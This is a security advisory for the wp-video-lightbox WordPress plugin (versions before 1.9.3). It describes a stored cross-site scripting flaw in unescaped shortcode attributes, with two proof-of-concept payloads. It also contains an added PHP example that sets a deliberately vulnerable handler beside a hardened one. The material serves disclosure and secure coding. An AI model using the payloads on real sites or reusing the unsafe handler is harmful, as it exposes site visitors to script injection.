The plugin does not escape the attributes of its shortcodes, allowing users with a role as low as Contributor to perform Cross-Site Scripting attacks.
[video_lightbox_vimeo5 video_id='"onmouseover=alert(/XSS/) b="' width="640" height="480" anchor="Click here to open vimeo video"]

[video_lightbox_vimeo5 video_id="13562192" width="640" height="480" anchor='http"onerror=alert(/XSS/)//']
| CPE | Name | Operator | Version |
|---|---|---|---|
| | wp-video-lightbox | lt | 1.9.3 |
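As an added illustration (not the plugin's own code), the unescaped shortcode pattern this advisory describes next to a hardened handler that uses WordPress's escaping helpers; the output markup, function names and the treatment of `anchor` as either link text or an image URL are assumptions for this example:

```php
<?php
// Added example, not code from the wp-video-lightbox plugin. The markup and
// the rule "anchor starting with http is an image URL" are assumptions.

// Vulnerable pattern: attribute values are concatenated straight into HTML,
// so a contributor-authored shortcode can break out of the attribute.
function vl_vimeo_shortcode_unsafe( $atts ) {
    $a = shortcode_atts( array(
        'video_id' => '',
        'width'    => '640',
        'height'   => '480',
        'anchor'   => '',
    ), $atts, 'video_lightbox_vimeo5' );

    $anchor = ( strpos( $a['anchor'], 'http' ) === 0 )
        ? '<img src="' . $a['anchor'] . '" />'
        : $a['anchor'];

    return '<a href="https://vimeo.com/' . $a['video_id'] . '"'
         . ' data-width="' . $a['width'] . '" data-height="' . $a['height'] . '">'
         . $anchor . '</a>';
}

// Hardened pattern: validate where the format is known, escape for the
// context each value lands in (URL, attribute, text), and cast sizes to int.
function vl_vimeo_shortcode_safe( $atts ) {
    $a = shortcode_atts( array(
        'video_id' => '',
        'width'    => '640',
        'height'   => '480',
        'anchor'   => '',
    ), $atts, 'video_lightbox_vimeo5' );

    // Vimeo IDs are numeric; reject anything else rather than escaping it.
    if ( ! preg_match( '/^\d+$/', $a['video_id'] ) ) {
        return '';
    }
    $width  = absint( $a['width'] );
    $height = absint( $a['height'] );

    $anchor = ( strpos( $a['anchor'], 'http' ) === 0 )
        ? '<img src="' . esc_url( $a['anchor'] ) . '" />'
        : esc_html( $a['anchor'] );

    return '<a href="' . esc_url( 'https://vimeo.com/' . $a['video_id'] ) . '"'
         . ' data-width="' . esc_attr( $width ) . '" data-height="' . esc_attr( $height ) . '">'
         . $anchor . '</a>';
}

add_shortcode( 'video_lightbox_vimeo5', 'vl_vimeo_shortcode_safe' );
```

Fed the advisory's first payload, the unsafe handler emits `href="https://vimeo.com/"onmouseover=..."`, while the safe handler returns an empty string because the ID fails the numeric check.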